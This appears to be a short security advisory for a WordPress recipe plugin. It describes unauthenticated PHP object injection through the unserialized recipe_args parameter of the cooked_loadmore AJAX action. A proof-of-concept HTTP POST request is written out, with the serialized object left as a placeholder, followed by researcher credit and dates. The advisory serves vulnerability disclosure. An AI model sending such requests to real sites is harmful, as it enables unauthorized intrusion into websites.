The plugin does not properly validate or sanitize the recipe_args parameter before unserializing it in the cooked_loadmore action, allowing an unauthenticated attacker to trigger a PHP Object injection vulnerability.
POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 769 Connection: close action=cooked_loadmore&atts%5Bcategory%5D=false&atts%5Border%5D=false&atts%5Borderby%5D=false&atts%5Bshow%5D=false&atts%5Bsearch%5D=true&atts%5Bpagination%5D=true&atts%5Bcolumns%5D=3&atts%5Blayout%5D=modern&atts%5Bauthor%5D=&atts%5Bcompact%5D=false&atts%5Bhide_browse%5D=false&atts%5Bhide_sorting%5D=false&atts%5Bexclude%5D=false&atts%5Binline_browse%5D=false&atts%5Bcuisine%5D=false&atts%5Bcooking-method%5D=false&atts%5Btag%5D=false&recipe_args=<SERIALIZED_PHP_OBJECT>&page=1&is_own_profile=
Marcin Motwicki
Marcin Motwicki
Yes
2022-11-21 (about 10 months ago)
2022-11-21 (about 10 months ago)
2023-06-12 (about 3 months ago)